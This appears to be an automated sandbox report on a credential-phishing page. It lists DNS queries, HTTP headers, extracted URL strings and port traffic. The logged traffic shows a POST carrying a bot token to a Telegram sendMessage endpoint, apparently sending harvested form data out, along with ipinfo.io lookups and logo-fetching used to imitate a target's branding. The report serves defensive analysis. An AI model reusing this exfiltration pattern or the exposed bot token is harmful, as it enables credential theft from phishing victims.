Source: global trafficDNS traffic detected: DNS query: logo.clearbit.com
Source: global trafficDNS traffic detected: DNS query: image.thum.io
Source: global trafficDNS traffic detected: DNS query: ka-f.fontawesome.com
Source: global trafficDNS traffic detected: DNS query: ipinfo.io
Source: global trafficDNS traffic detected: DNS query: dns.google
Source: global trafficDNS traffic detected: DNS query: api.telegram.org
Source: global trafficDNS traffic detected: DNS query: www.agriparadigma.it
Source: global trafficDNS traffic detected: DNS query: www.tentamus.com
Source: unknownHTTP traffic detected: POST /bot7569984569:AAHY-ZYlm2R_gaIAe2xifFZ7ATgkuW-WPcs/sendMessage HTTP/1.1Host: api.telegram.orgConnection: keep-aliveContent-Length: 686sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: application/json, text/javascript, */*; q=0.01Content-Type: application/x-www-form-urlencoded; charset=UTF-8sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://igacorp.conohawing.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://igacorp.conohawing.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCross-Origin-Resource-Policy: cross-originContent-Type: text/html; charset=UTF-8X-Content-Type-Options: nosniffDate: Thu, 28 Nov 2024 10:32:18 GMTServer: sffeContent-Length: 1593X-XSS-Protection: 0Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Connection: close
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeexpires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8transfer-encoding: chunkeddate: Thu, 28 Nov 2024 10:33:03 GMTserver: LiteSpeedaccess-control-allow-methods: GET, POST, OPTIONSaccess-control-allow-headers: X-Requested-With access-control-allow-credentials: truealt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
Source: chromecache_127.1.drString found in binary or memory: http://dimsemenov.com/plugins/magnific-popup/
Source: chromecache_106.1.drString found in binary or memory: http://fontawesome.io
Source: chromecache_106.1.drString found in binary or memory: http://fontawesome.io/license
Source: chromecache_117.1.dr, chromecache_106.1.drString found in binary or memory: http://getbootstrap.com)
Source: chromecache_143.1.dr, chromecache_125.1.drString found in binary or memory: http://jquery.org/license
Source: chromecache_173.1.dr, chromecache_169.1.drString found in binary or memory: http://opensource.org/licenses/MIT).
Source: chromecache_142.1.drString found in binary or memory: http://www.tentamus.com/tentamus-agriparadigma-en/wp-content/uploads/sites/25/2017/02/HeaderImage_00
Source: chromecache_142.1.drString found in binary or memory: http://www.tentamus.com/tentamus-agriparadigma-en/wp-content/uploads/sites/25/2018/04/0000_03.jpg
Source: chromecache_142.1.drString found in binary or memory: http://www.tentamus.com/tentamus-agriparadigma-en/wp-content/uploads/sites/25/2018/04/0001_02.jpg
Source: chromecache_117.1.drString found in binary or memory: https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js
Source: chromecache_117.1.drString found in binary or memory: https://api.telegram.org/bot$
Source: chromecache_142.1.drString found in binary or memory: https://api.w.org/
Source: chromecache_143.1.dr, chromecache_125.1.drString found in binary or memory: https://bugs.chromium.org/p/chromium/issues/detail?id=378607
Source: chromecache_143.1.dr, chromecache_125.1.drString found in binary or memory: https://bugs.chromium.org/p/chromium/issues/detail?id=449857
Source: chromecache_143.1.dr, chromecache_125.1.drString found in binary or memory: https://bugs.chromium.org/p/chromium/issues/detail?id=470258
Source: chromecache_143.1.dr, chromecache_125.1.drString found in binary or memory: https://bugs.chromium.org/p/chromium/issues/detail?id=589347
Source: chromecache_143.1.dr, chromecache_125.1.drString found in binary or memory: https://bugs.jquery.com/ticket/12359
Source: chromecache_143.1.dr, chromecache_125.1.drString found in binary or memory: https://bugs.jquery.com/ticket/13378
Source: chromecache_143.1.dr, chromecache_125.1.drString found in binary or memory: https://bugs.webkit.org/show_bug.cgi?id=136851
Source: chromecache_143.1.dr, chromecache_125.1.drString found in binary or memory: https://bugs.webkit.org/show_bug.cgi?id=137337
Source: chromecache_143.1.dr, chromecache_125.1.drString found in binary or memory: https://bugs.webkit.org/show_bug.cgi?id=29084
Source: chromecache_143.1.dr, chromecache_125.1.drString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=687787
Source: chromecache_117.1.drString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/axios/0.20.0/axios.min.js
Source: chromecache_117.1.drString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js
Source: chromecache_117.1.drString found in binary or memory: https://code.jquery.com/jquery-3.1.1.min.js
Source: chromecache_117.1.drString found in binary or memory: https://code.jquery.com/jquery-3.2.1.slim.min.js
Source: chromecache_117.1.drString found in binary or memory: https://code.jquery.com/jquery-3.3.1.js
Source: chromecache_143.1.dr, chromecache_125.1.drString found in binary or memory: https://developer.mozilla.org/en-US/docs/CSS/display
Source: chromecache_117.1.drString found in binary or memory: https://dns.google/resolve?name=$
Source: chromecache_143.1.dr, chromecache_125.1.drString found in binary or memory: https://drafts.csswg.org/cssom/#common-serializing-idioms
Source: chromecache_143.1.dr, chromecache_125.1.drString found in binary or memory: https://drafts.csswg.org/cssom/#resolved-values
Source: chromecache_142.1.drString found in binary or memory: https://elims.agriparadigma.it/web/
Source: chromecache_117.1.drString found in binary or memory: https://firebasestorage.googleapis.com/v0/b/dellcssfile.appspot.com/o/bootstrap.min.css?alt=media&to
Source: chromecache_117.1.drString found in binary or memory: https://firebasestorage.googleapis.com/v0/b/dellcssfile.appspot.com/o/font-awesome.min.css?alt=media
Source: chromecache_117.1.drString found in binary or memory: https://fontawesome.com
Source: chromecache_117.1.drString found in binary or memory: https://fontawesome.com/license/free
Source: chromecache_117.1.drString found in binary or memory: https://fonts.googleapis.com/css?family=Archivo
Source: chromecache_160.1.drString found in binary or memory: https://fonts.gstatic.com/s/archivonarrow/v30/tss5ApVBdCYD5Q7hcxTE1ArZ0Zz8oY2KRmwvKhhvLFG6o3ms.woff2
Source: chromecache_160.1.drString found in binary or memory: https://fonts.gstatic.com/s/archivonarrow/v30/tss5ApVBdCYD5Q7hcxTE1ArZ0Zz8oY2KRmwvKhhvLFG6rHmsJCQ.wo
Source: chromecache_160.1.drString found in binary or memory: https://fonts.gstatic.com/s/archivonarrow/v30/tss5ApVBdCYD5Q7hcxTE1ArZ0Zz8oY2KRmwvKhhvLFG6rXmsJCQ.wo
Source: chromecache_175.1.dr, chromecache_101.1.drString found in binary or memory: https://getbootstrap.com)
Source: chromecache_171.1.dr, chromecache_126.1.drString found in binary or memory: https://getbootstrap.com/)
Source: chromecache_143.1.dr, chromecache_125.1.drString found in binary or memory: https://github.com/eslint/eslint/issues/3229
Source: chromecache_143.1.dr, chromecache_125.1.drString found in binary or memory: https://github.com/eslint/eslint/issues/6125
Source: chromecache_117.1.drString found in binary or memory: https://github.com/h5bp/html5-boilerplate/blob/master/src/css/main.css
Source: chromecache_143.1.dr, chromecache_125.1.drString found in binary or memory: https://github.com/jquery/jquery/pull/557)
Source: chromecache_143.1.dr, chromecache_125.1.drString found in binary or memory: https://github.com/jquery/sizzle/pull/225
Source: chromecache_143.1.dr, chromecache_125.1.drString found in binary or memory: https://github.com/jrburke/requirejs/wiki/Updating-existing-libraries#wiki-anon
Source: chromecache_117.1.dr, chromecache_171.1.dr, chromecache_106.1.dr, chromecache_175.1.dr, chromecache_126.1.dr, chromecache_101.1.drString found in binary or memory: https://github.com/twbs/bootstrap/blob/master/LICENSE)
Source: chromecache_171.1.dr, chromecache_175.1.dr, chromecache_126.1.dr, chromecache_101.1.drString found in binary or memory: https://github.com/twbs/bootstrap/graphs/contributors)
Source: chromecache_143.1.dr, chromecache_125.1.drString found in binary or memory: https://html.spec.whatwg.org/#strip-and-collapse-whitespace
Source: chromecache_143.1.dr, chromecache_125.1.drString found in binary or memory: https://html.spec.whatwg.org/multipage/forms.html#category-listed
Source: chromecache_143.1.dr, chromecache_125.1.drString found in binary or memory: https://html.spec.whatwg.org/multipage/forms.html#concept-fe-disabled
Source: chromecache_143.1.dr, chromecache_125.1.drString found in binary or memory: https://html.spec.whatwg.org/multipage/forms.html#concept-option-disabled
Source: chromecache_143.1.dr, chromecache_125.1.drString found in binary or memory: https://html.spec.whatwg.org/multipage/scripting.html#selector-disabled
Source: chromecache_143.1.dr, chromecache_125.1.drString found in binary or memory: https://html.spec.whatwg.org/multipage/scripting.html#selector-enabled
Source: chromecache_143.1.dr, chromecache_125.1.drString found in binary or memory: https://html.spec.whatwg.org/multipage/syntax.html#attributes-2
Source: chromecache_142.1.drString found in binary or memory: https://hu-manity.co/
Source: chromecache_117.1.drString found in binary or memory: https://image.thum.io/get/width/1200/http://
Source: chromecache_143.1.dr, chromecache_125.1.drString found in binary or memory: https://infra.spec.whatwg.org/#strip-and-collapse-ascii-whitespace
Source: chromecache_117.1.drString found in binary or memory: https://ipinfo.io/json
Source: chromecache_110.1.dr, chromecache_139.1.drString found in binary or memory: https://ipinfo.io/missingauth
Source: chromecache_143.1.dr, chromecache_125.1.drString found in binary or memory: https://jquery.com/
Source: chromecache_143.1.dr, chromecache_125.1.drString found in binary or memory: https://jquery.org/license
Source: chromecache_143.1.dr, chromecache_125.1.drString found in binary or memory: https://jsperf.com/getall-vs-sizzle/2
Source: chromecache_143.1.dr, chromecache_125.1.drString found in binary or memory: https://jsperf.com/thor-indexof-vs-for/5
Source: chromecache_117.1.drString found in binary or memory: https://ka-f.fontawesome.com/releases/v5.15.4/webfonts/free-fa-brands-400.eot);
Source: chromecache_117.1.drString found in binary or memory: https://ka-f.fontawesome.com/releases/v5.15.4/webfonts/free-fa-brands-400.eot?#iefix)
Source: chromecache_117.1.drString found in binary or memory: https://ka-f.fontawesome.com/releases/v5.15.4/webfonts/free-fa-brands-400.svg#fontawesome)
Source: chromecache_117.1.drString found in binary or memory: https://ka-f.fontawesome.com/releases/v5.15.4/webfonts/free-fa-brands-400.ttf)
Source: chromecache_117.1.drString found in binary or memory: https://ka-f.fontawesome.com/releases/v5.15.4/webfonts/free-fa-brands-400.woff)
Source: chromecache_117.1.drString found in binary or memory: https://ka-f.fontawesome.com/releases/v5.15.4/webfonts/free-fa-brands-400.woff2)
Source: chromecache_117.1.drString found in binary or memory: https://ka-f.fontawesome.com/releases/v5.15.4/webfonts/free-fa-regular-400.eot);
Source: chromecache_117.1.drString found in binary or memory: https://ka-f.fontawesome.com/releases/v5.15.4/webfonts/free-fa-regular-400.eot?#iefix)
Source: chromecache_117.1.drString found in binary or memory: https://ka-f.fontawesome.com/releases/v5.15.4/webfonts/free-fa-regular-400.svg#fontawesome)
Source: chromecache_117.1.drString found in binary or memory: https://ka-f.fontawesome.com/releases/v5.15.4/webfonts/free-fa-regular-400.ttf)
Source: chromecache_117.1.drString found in binary or memory: https://ka-f.fontawesome.com/releases/v5.15.4/webfonts/free-fa-regular-400.woff)
Source: chromecache_117.1.drString found in binary or memory: https://ka-f.fontawesome.com/releases/v5.15.4/webfonts/free-fa-regular-400.woff2)
Source: chromecache_117.1.drString found in binary or memory: https://ka-f.fontawesome.com/releases/v5.15.4/webfonts/free-fa-solid-900.eot);
Source: chromecache_117.1.drString found in binary or memory: https://ka-f.fontawesome.com/releases/v5.15.4/webfonts/free-fa-solid-900.eot?#iefix)
Source: chromecache_117.1.drString found in binary or memory: https://ka-f.fontawesome.com/releases/v5.15.4/webfonts/free-fa-solid-900.svg#fontawesome)
Source: chromecache_117.1.drString found in binary or memory: https://ka-f.fontawesome.com/releases/v5.15.4/webfonts/free-fa-solid-900.ttf)
Source: chromecache_117.1.drString found in binary or memory: https://ka-f.fontawesome.com/releases/v5.15.4/webfonts/free-fa-solid-900.woff)
Source: chromecache_117.1.drString found in binary or memory: https://ka-f.fontawesome.com/releases/v5.15.4/webfonts/free-fa-solid-900.woff2)
Source: chromecache_117.1.drString found in binary or memory: https://kit.fontawesome.com/585b051251.js
Source: chromecache_117.1.drString found in binary or memory: https://logo.clearbit.com/
Source: chromecache_117.1.drString found in binary or memory: https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css
Source: chromecache_117.1.drString found in binary or memory: https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js
Source: chromecache_149.1.dr, chromecache_131.1.drString found in binary or memory: https://modernizr.com/download/?-cssanimations-csstransforms-csstransforms3d-csstransitions-prefixed
Source: chromecache_143.1.dr, chromecache_125.1.drString found in binary or memory: https://promisesaplus.com/#point-48
Source: chromecache_143.1.dr, chromecache_125.1.drString found in binary or memory: https://promisesaplus.com/#point-54
Source: chromecache_143.1.dr, chromecache_125.1.drString found in binary or memory: https://promisesaplus.com/#point-57
Source: chromecache_143.1.dr, chromecache_125.1.drString found in binary or memory: https://promisesaplus.com/#point-59
Source: chromecache_143.1.dr, chromecache_125.1.drString found in binary or memory: https://promisesaplus.com/#point-61
Source: chromecache_143.1.dr, chromecache_125.1.drString found in binary or memory: https://promisesaplus.com/#point-64
Source: chromecache_143.1.dr, chromecache_125.1.drString found in binary or memory: https://promisesaplus.com/#point-75
Source: chromecache_117.1.drString found in binary or memory: https://pub-3a30ce63185e496a8319c2231b7f2476.r2.dev/session_expired.PNG
Source: chromecache_142.1.drString found in binary or memory: https://schema.org
Source: chromecache_143.1.dr, chromecache_125.1.drString found in binary or memory: https://sizzlejs.com/
Source: chromecache_117.1.drString found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js
Source: chromecache_143.1.dr, chromecache_125.1.drString found in binary or memory: https://web.archive.org/web/20100324014747/http://blindsignals.com/index.php/2009/07/jquery-delay/
Source: chromecache_143.1.dr, chromecache_125.1.drString found in binary or memory: https://web.archive.org/web/20141116233347/http://fluidproject.org/blog/2008/01/09/getting-setting-a
Source: chromecache_142.1.drString found in binary or memory: https://www.agriparadigma.it/
Source: chromecache_142.1.drString found in binary or memory: https://www.agriparadigma.it/#/schema/BreadcrumbList
Source: chromecache_142.1.drString found in binary or memory: https://www.agriparadigma.it/#/schema/Organization
Source: chromecache_142.1.drString found in binary or memory: https://www.agriparadigma.it/#/schema/WebSite
Source: chromecache_142.1.drString found in binary or memory: https://www.agriparadigma.it/about-us/
Source: chromecache_142.1.drString found in binary or memory: https://www.agriparadigma.it/accreditations/
Source: chromecache_142.1.drString found in binary or memory: https://www.agriparadigma.it/contattaci/
Source: chromecache_142.1.drString found in binary or memory: https://www.agriparadigma.it/contattaci/lavora-con-noi/
Source: chromecache_142.1.drString found in binary or memory: https://www.agriparadigma.it/en/
Source: chromecache_142.1.drString found in binary or memory: https://www.agriparadigma.it/gtc/
Source: chromecache_142.1.drString found in binary or memory: https://www.agriparadigma.it/impressum/
Source: chromecache_142.1.drString found in binary or memory: https://www.agriparadigma.it/lab-services/food-products-animal-feed/
Source: chromecache_142.1.drString found in binary or memory: https://www.agriparadigma.it/lab-services/instrumental-analyses/
Source: chromecache_142.1.drString found in binary or memory: https://www.agriparadigma.it/lab-services/microbiology-and-molecular-biology/
Source: chromecache_142.1.drString found in binary or memory: https://www.agriparadigma.it/lab-services/microbiology-molecular-biology/
Source: chromecache_142.1.drString found in binary or memory: https://www.agriparadigma.it/lab-services/organic-micropollutants/
Source: chromecache_142.1.drString found in binary or memory: https://www.agriparadigma.it/lab-services/physico-chemical-analyses/
Source: chromecache_142.1.drString found in binary or memory: https://www.agriparadigma.it/lab-services/water-land-for-crop-cultivation/
Source: chromecache_142.1.drString found in binary or memory: https://www.agriparadigma.it/labore/#
Source: chromecache_142.1.drString found in binary or memory: https://www.agriparadigma.it/news/
Source: chromecache_142.1.drString found in binary or memory: https://www.agriparadigma.it/privacy/
Source: chromecache_142.1.drString found in binary or memory: https://www.agriparadigma.it/responsabilita-amministrativa-dimpresa-ai-sensi-del-dlgs-231-01/
Source: chromecache_142.1.drString found in binary or memory: https://www.agriparadigma.it/search/
Source: chromecache_142.1.drString found in binary or memory: https://www.agriparadigma.it/t-magazine/
Source: chromecache_142.1.drString found in binary or memory: https://www.agriparadigma.it/whistleblowing/
Source: chromecache_142.1.drString found in binary or memory: https://www.agriparadigma.it/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.7.7
Source: chromecache_142.1.drString found in binary or memory: https://www.agriparadigma.it/wp-content/plugins/contact-form-7/includes/js/index.js?ver=5.7.7
Source: chromecache_142.1.drString found in binary or memory: https://www.agriparadigma.it/wp-content/plugins/contact-form-7/includes/swv/js/index.js?ver=5.7.7
Source: chromecache_142.1.drString found in binary or memory: https://www.agriparadigma.it/wp-content/plugins/cookie-notice/css/front.min.css?ver=2.5.4
Source: chromecache_142.1.drString found in binary or memory: https://www.agriparadigma.it/wp-content/plugins/cookie-notice/js/front.min.js?ver=2.5.4
Source: chromecache_142.1.drString found in binary or memory: https://www.agriparadigma.it/wp-content/plugins/lab-finder/labs.json?v=
Source: chromecache_142.1.drString found in binary or memory: https://www.agriparadigma.it/wp-content/plugins/lab-finder/lang/locale-
Source: chromecache_142.1.drString found in binary or memory: https://www.agriparadigma.it/wp-content/plugins/multilingual-press/assets/css/frontend.min.css?ver=1
Source: chromecache_142.1.drString found in binary or memory: https://www.agriparadigma.it/wp-content/plugins/tailor/assets/css/ie.min.css?ver=1.8.2
Source: chromecache_142.1.drString found in binary or memory: https://www.agriparadigma.it/wp-content/plugins/tailor/assets/js/dist/frontend.min.js?ver=1.8.2
Source: chromecache_142.1.drString found in binary or memory: https://www.agriparadigma.it/wp-content/plugins/tailor/assets/js/dist/vendor/magnific-popup.min.js?v
Source: chromecache_142.1.drString found in binary or memory: https://www.agriparadigma.it/wp-content/plugins/tailor/assets/js/dist/vendor/modernizr.min.js?ver=1.
Source: chromecache_142.1.drString found in binary or memory: https://www.agriparadigma.it/wp-content/plugins/tailor/assets/js/dist/vendor/shuffle.min.js?ver=1.8.
Source: chromecache_142.1.drString found in binary or memory: https://www.agriparadigma.it/wp-content/plugins/tailor/assets/js/dist/vendor/slick.min.js?ver=1.8.2
Source: chromecache_142.1.drString found in binary or memory: https://www.agriparadigma.it/wp-content/plugins/wpcf7-redirect/build/css/wpcf7-redirect-frontend.min
Source: chromecache_142.1.drString found in binary or memory: https://www.agriparadigma.it/wp-content/plugins/wpcf7-redirect/build/js/wpcf7r-fe.js?ver=1.1
Source: chromecache_142.1.drString found in binary or memory: https://www.agriparadigma.it/wp-content/themes/tentamus-labor/favicon-71.ico
Source: chromecache_142.1.drString found in binary or memory: https://www.agriparadigma.it/wp-content/themes/tentamus-labor/images/MemberTag.png);
Source: chromecache_142.1.drString found in binary or memory: https://www.agriparadigma.it/wp-content/themes/tentamus-labor/images/MemberTagActive.png);
Source: chromecache_142.1.drString found in binary or memory: https://www.agriparadigma.it/wp-content/themes/tentamus-labor/images/MemberTagActiveMobile.png);
Source: chromecache_142.1.drString found in binary or memory: https://www.agriparadigma.it/wp-content/themes/tentamus-labor/images/MemberTagFooter.png?v=2);
Source: chromecache_142.1.drString found in binary or memory: https://www.agriparadigma.it/wp-content/themes/tentamus-labor/images/MemberTagFooterActive.png?v=2);
Source: chromecache_142.1.drString found in binary or memory: https://www.agriparadigma.it/wp-content/themes/tentamus-labor/images/MemberTagMobile.png);
Source: chromecache_142.1.drString found in binary or memory: https://www.agriparadigma.it/wp-content/themes/tentamus/assets/fonts/barlow300.woff2
Source: chromecache_142.1.drString found in binary or memory: https://www.agriparadigma.it/wp-content/themes/tentamus/assets/fonts/barlow400.woff2
Source: chromecache_142.1.drString found in binary or memory: https://www.agriparadigma.it/wp-content/themes/tentamus/assets/fonts/barlow500.woff2
Source: chromecache_142.1.drString found in binary or memory: https://www.agriparadigma.it/wp-content/themes/tentamus/assets/fonts/barlow600.woff2
Source: chromecache_142.1.drString found in binary or memory: https://www.agriparadigma.it/wp-content/themes/tentamus/assets/images/tentamus-marker-dark.svg
Source: chromecache_142.1.drString found in binary or memory: https://www.agriparadigma.it/wp-content/themes/tentamus/assets/scripts/amcharts4/core.js
Source: chromecache_142.1.drString found in binary or memory: https://www.agriparadigma.it/wp-content/themes/tentamus/assets/scripts/amcharts4/maps.js
Source: chromecache_142.1.drString found in binary or memory: https://www.agriparadigma.it/wp-content/themes/tentamus/assets/scripts/amcharts4/worldLow.js
Source: chromecache_142.1.drString found in binary or memory: https://www.agriparadigma.it/wp-content/themes/tentamus/dist/scripts/main.js?ver=2001211040
Source: chromecache_142.1.drString found in binary or memory: https://www.agriparadigma.it/wp-content/themes/tentamus/dist/styles/main.css?ver=2001211040
Source: chromecache_142.1.drString found in binary or memory: https://www.agriparadigma.it/wp-content/uploads/sites/71/2017/02/AGRI_logo_white.png
Source: chromecache_142.1.drString found in binary or memory: https://www.agriparadigma.it/wp-content/uploads/sites/71/2017/02/HeaderImage_0005_Agriculture-150x15
Source: chromecache_142.1.drString found in binary or memory: https://www.agriparadigma.it/wp-content/uploads/sites/71/2017/02/HeaderImage_0005_Agriculture.jpg
Source: chromecache_142.1.drString found in binary or memory: https://www.agriparadigma.it/wp-content/uploads/sites/71/2017/02/HeaderImage_bilacon05-1024x376.jpg
Source: chromecache_142.1.drString found in binary or memory: https://www.agriparadigma.it/wp-content/uploads/sites/71/2017/02/HeaderImage_bilacon05-300x110.jpg
Source: chromecache_142.1.drString found in binary or memory: https://www.agriparadigma.it/wp-content/uploads/sites/71/2017/02/HeaderImage_bilacon05-768x282.jpg
Source: chromecache_142.1.drString found in binary or memory: https://www.agriparadigma.it/wp-content/uploads/sites/71/2017/02/HeaderImage_bilacon05.jpg
Source: chromecache_142.1.drString found in binary or memory: https://www.agriparadigma.it/wp-content/uploads/sites/71/2017/06/AGRI_logo_Plain.jpg
Source: chromecache_142.1.drString found in binary or memory: https://www.agriparadigma.it/wp-content/uploads/sites/71/2018/04/0000_03-150x150.jpg
Source: chromecache_142.1.drString found in binary or memory: https://www.agriparadigma.it/wp-content/uploads/sites/71/2018/04/0000_03.jpg
Source: chromecache_142.1.drString found in binary or memory: https://www.agriparadigma.it/wp-content/uploads/sites/71/2018/04/0001_02-150x150.jpg
Source: chromecache_142.1.drString found in binary or memory: https://www.agriparadigma.it/wp-content/uploads/sites/71/2018/04/0001_02.jpg
Source: chromecache_142.1.drString found in binary or memory: https://www.agriparadigma.it/wp-content/uploads/sites/71/tailor/css/frontend.min.css?ver=1.8.2
Source: chromecache_142.1.drString found in binary or memory: https://www.agriparadigma.it/wp-includes/css/classic-themes.min.css?ver=1
Source: chromecache_142.1.drString found in binary or memory: https://www.agriparadigma.it/wp-includes/js/imagesloaded.min.js?ver=4.1.4
Source: chromecache_142.1.drString found in binary or memory: https://www.agriparadigma.it/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2
Source: chromecache_142.1.drString found in binary or memory: https://www.agriparadigma.it/wp-includes/js/jquery/jquery.min.js?ver=3.6.1
Source: chromecache_142.1.drString found in binary or memory: https://www.agriparadigma.it/wp-includes/js/underscore.min.js?ver=1.13.4
Source: chromecache_142.1.drString found in binary or memory: https://www.agriparadigma.it/wp-includes/wlwmanifest.xml
Source: chromecache_142.1.drString found in binary or memory: https://www.agriparadigma.it/wp-json/
Source: chromecache_142.1.drString found in binary or memory: https://www.agriparadigma.it/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.agriparadigma.it%2F
Source: chromecache_142.1.drString found in binary or memory: https://www.agriparadigma.it/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.agriparadigma.it%2F&#038
Source: chromecache_142.1.drString found in binary or memory: https://www.agriparadigma.it/wp-json/wp/v2/pages/7
Source: chromecache_142.1.drString found in binary or memory: https://www.agriparadigma.it/xmlrpc.php?rsd
Source: chromecache_117.1.drString found in binary or memory: https://www.google.com/s2/favicons?domain=
Source: chromecache_117.1.drString found in binary or memory: https://www.google.com/s2/favicons?domain=?v=BUILD_HASH
Source: chromecache_142.1.drString found in binary or memory: https://www.tentamus.com
Source: chromecache_142.1.drString found in binary or memory: https://www.tentamus.com/
Source: chromecache_142.1.drString found in binary or memory: https://www.tentamus.com/tentamus-agriparadigma-it/wp-content/uploads/sites/71/2017/02/faux-home.png
Source: chromecache_142.1.drString found in binary or memory: https://youtu.be/5ZRZkSZRn3A
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49898 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49893 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49909 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
Source: unknownNetwork traffic detected: HTTP traffic on port 49887 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
